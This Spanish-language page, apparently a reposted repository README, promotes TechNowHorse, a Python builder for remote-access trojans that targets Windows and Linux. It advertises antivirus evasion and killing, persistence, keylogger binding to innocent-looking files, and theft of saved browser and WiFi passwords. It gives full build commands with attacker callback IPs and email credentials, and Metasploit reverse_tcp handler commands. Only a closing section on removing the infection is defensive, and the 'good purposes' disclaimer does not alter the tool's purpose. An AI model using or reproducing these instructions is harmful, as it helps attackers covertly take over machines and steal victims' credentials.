TechNowHorse RAT para Windows Linux Python 3

TechNowHorse: RAT para Windows/Linux escrito en Python 3

TechNowHorse es un generador de RAT (Remote Administrator Trojan) para sistemas Windows/Linux escrito en Python 3.

Descargo de responsabilidad

Este proyecto fue creado sólo para buenos propósitos y uso personal.

ESTE SOFTWARE SE PROPORCIONA “TAL CUAL” SIN GARANTÍA DE NINGÚN TIPO. PUEDES USAR ESTE SOFTWARE BAJO TU PROPIO RIESGO. EL USO ES RESPONSABILIDAD COMPLETA DEL USUARIO FINAL. LOS DESARROLLADORES NO ASUMEN NINGUNA RESPONSABILIDAD Y NO SON RESPONSABLES DE NINGÚN MAL USO O DAÑO CAUSADO POR ESTE PROGRAMA.

Características

  • Funciona en Windows/Linux
  • Notificar a la nueva víctima por correo electrónico
  • Indetectable
  • No requiere privilegios de root o de administrador
  • Persistencia
  • Envía una captura de pantalla de la pantalla del PC de la víctima por correo electrónico
  • Darle acceso total al atacante a Meterpreter
  • Nunca requirió la instalación de metesploit para crear un troyano.
  • Crea un binario ejecutable con cero dependencias
  • Crear menos tamaño ~ 5mb de carga útil con la funcionalidad avanzada
  • Ofuscar la carga útil antes de compilarla, por lo tanto, eludir unos cuantos antivirus más
  • La carga útil generada está encriptada con base64, por lo que es extremadamente difícil hacer ingeniería inversa de la carga útil
  • Funciona para matar el antivirus en el PC de la víctima e intenta desactivar el Centro de Seguridad
  • Impresionante interfaz colorida para generar la carga útil
  • En el lado del atacante: Mientras crea la carga útil, el script detecta automáticamente las dependencias que faltan y las instala.
  • Capaz de añadir un icono personalizado al archivo malo.
  • Carpeta incorporada que puedes vincular el Keylogger a cualquier archivo [.pdf, .txt, .exe etc.], ejecutando el archivo legítimo en la parte front end y los códigos malignos en la parte back-end como un servicio.
  • Comprueba si la instancia ya está funcionando en el sistema, si se encuentra una instancia en funcionamiento, entonces sólo se ejecuta el archivo legítimo .
  • El atacante puede crear/compilar para ambos sistemas operativos Windows/Linux usando el sistema Linux, pero sólo puede crear/compilar el ejecutable Windows usando la máquina Windows.
  • Recupera las contraseñas guardadas del sistema de la víctima y las envía al atacante.
Supported Retrives, intenta recuperar las contraseñas guardadas de:
Navegador Chrome
WiFi

Nota

Custom Stealer está codificado, no depende de LaZagne

A continuación se presentan las limitaciones de la carga útil del meterpreter generada usando el metasploit:

  • Hay que ejecutar el Metasploit Listener antes de ejecutar la puerta trasera
  • La puerta trasera en sí no se convierte en persistencia, tenemos que usar los módulos de post-explotación para hacer la persistencia de la puerta trasera. Y los módulos de post-explotación sólo pueden ser utilizados después de una explotación exitosa.
  • No nos notificaron cuando la carga útil se ejecutó en el nuevo sistema.
  • Todos sabemos lo potente que es la carga útil de Meterpeter, pero aún así la carga útil que se hace de ella no es satisfactoria.

Las siguientes son las características de este generador de carga útil que te darán una buena idea de este script python:

  • Utiliza el registro de Windows para convertirse en persistencia en Windows.
  • También se las arregla para convertirse en persistencia en el sistema de Linux.
  • La carga útil puede funcionar tanto en LINUX como en WINDOWS.
  • Proporciona acceso completo, ya que el listener metaploit puede ser usado así como soporta listener personalizado (Puedes crear tu propio listener)
  • Envía una notificación por correo electrónico, cuando la carga útil se ejecuta en un nuevo sistema, con información completa del sistema.
  • Genera la carga útil en un minuto o menos.
  • Soporta todos los módulos de post-explotación de meterpreter.
  • La carga útil puede ser creada tanto en un sistema Windows como en un sistema Linux.

Requisitos

  • Python 3.X
  • Pocos módulos externos

En Windows, por favor, especifica/configura la ruta del Pyinstaller en paygen.py [Línea 14]

La ruta por defecto es: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Cámbialo de acuerdo a tu sistema

Cómo Usar en Linux

#Instalar dependencias
$ Install latest python 3.x
#Navega al directorio /opt (opcional)
$ cd /opt/
#Clonar este repositorio
$ git clone https://github.com/PushpenderIndia/technowhorse.git
#Entra en el repositorio
$ cd technowhorse
#Instalando dependencias
$ bash installer_linux.sh
#Si obtiene algún error al ejecutar installer_linux.sh, intente instalar usando installer_linux.py
$ python3 installer_linux.py
$ chmod +x paygen.py
$ python3 paygen.py --help
#Haciendo la carga útil/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path
#Haciendo Payload/RAT con Custom AVKiller [Por defecto, Toneladas de AntiVirus conocidos se añaden en Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
#Haciendo Payload/RAT con Custom Time para convertirse en persistencia
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 
#Nota: También puedes usar nuestros iconos personalizados de la carpeta de icon, sólo tienes que usarlos así --icon icon/pdf.ico

Cómo Usar en Windows

#Instalar dependencias 
$ Install latest python 3.x
#Clonar este repositorio
$ git clone https://github.com/PushpenderIndia/technowhorse.git
#Entra en el repositorio
$ cd technowhorse
#Instalando dependencias
$ python -m pip install -r requirements.txt
#Abre paygen.py en el editor de texto y configura la línea 14, establece la ruta del Pyinstaller, la ruta por defecto es la siguiente :-
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
#Menú de ayuda
$ python paygen.py --help
#Haciendo la carga útil/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path
#Haciendo Payload/RAT con Custom AVKiller [Por defecto, Toneladas de AntiVirus conocidos se añaden en Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
#Haciendo que Payload/RAT se vincule con un archivo legítimo [Cualquier archivo .exe, .pdf, .txt etc]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 
#Nota: También puedes usar nuestros iconos personalizados de la carpeta de icon, sólo tienes que usarlos así --icon icon/pdf.ico

Nota

Evil File (el archivo malo) se guardará dentro de la carpeta dist/, dentro de la carpeta technowhorse/

Estableciendo Conexión

  • Configuración recomendada, puedes intentar probarlo con cualquier otra carga útil en la línea 2
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

Argumentos Disponibles

  • Argumentos opcionales
CortoCompletoDescripción
-h–helpmostrar este mensaje de ayuda y salir
-k KILL_AV–kill_av KILL_AVAntivirusKiller: Especificar AV’s .exe que deben ser matados. Ex:- –kill_av cmd.exe
-t TIME_IN_SECONDS–persistence TIME_PERSISTENTConvertirse en persistencia después de __ segundos. default=10
-w–windowsGenerar un ejecutable de Windows.
-l–linuxGenerar un ejecutable de Linux.
-b file.txt–bind LEGITIMATE_FILE_PATH.pdfAutoBinder : Especifica la ruta del archivo legítimo.
-s–steal-passwordRobar la contraseña guardada de la máquina de la víctima

Nota

Se debe especificar si se trata de -w/–windows o -l/–linux

  • Argumentos obligatorios
CortoCompletoDescripción
–icon ICONEspecifica la ruta del icono, el icono del archivo malo
–ip IP_ADDRESSDirección de correo electrónico a la que enviar los informes.
–port PORTPuerto de la dirección IP dada en el argumento –ip.
-e EMAIL–email EMAILDirección de correo electrónico a la que enviar los informes.
-p PASSWORD–password PASSWORDContraseña para la dirección de correo electrónico dada en el argumento -e.
-o OUT–out OUTNombre del archivo de salida.

Capturas de Pantalla

Generando payload

Generar Payload
Generar Payload

Cuando la RAT se ejecuta, añade el Registro para convertirse en persistente

Persistencia en Windows
Persistencia en Windows

Obtener notificación de la víctima PC

Notificación por correo
Notificación por correo

Eliminar TechNowHorse en Windows

Método 1:

  • Ir al inicio, escribir regedit y ejecutar el primer programa, esto abrirá el editor del registro.
  • Navegar a la siguiente ruta
Computer\HKEY_CURRENT_USER\NSoftware\Microsoft\Windows\CurrentVersion\Run
  • Debería haber una entrada llamada winexplorer, haz clic con el botón derecho en esta entrada y selecciona Eliminar.
  • Ve a tu ruta de usuario > AppData > Roaming, verás un archivo llamado “explorer.exe“, esta es la RAT, haz clic con el botón derecho del ratón > Eliminar.
  • Reiniciar el sistema.

Método 2:

  • Ejecuta “RemoveTechnowHorse.bat” en el sistema infectado y luego reinicia la PC para detener la actual ejecución del archivo malvado.

Eliminar TechNowHorse en Linux

  • Abrir el archivo Autostart con cualquier editor de texto, Ruta de archivo Autostart:
~/.config/autostart/xinput.desktop
  • Quita estas 5 líneas:
[Desktop Entry]
    Type=Application
    X-GNOME-Autostart-enabled=true
    Name=Xinput
    Exec="destination_file_name"
  • Nota: destination_file_name es el nombre del archivo_maligno que le diste a tu Caballo de Troya usando el parámetro -o
  • Reinicia tu sistema y luego borra el archivo maligno almacenado en esta ruta.
  • Ruta de destino, donde se almacena el Caballo de Troya : ~/.config/xnput
Dark Mode

technowhorse (este enlace se abre en una nueva ventana) por PushpenderIndia (este enlace se abre en una nueva ventana)

TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.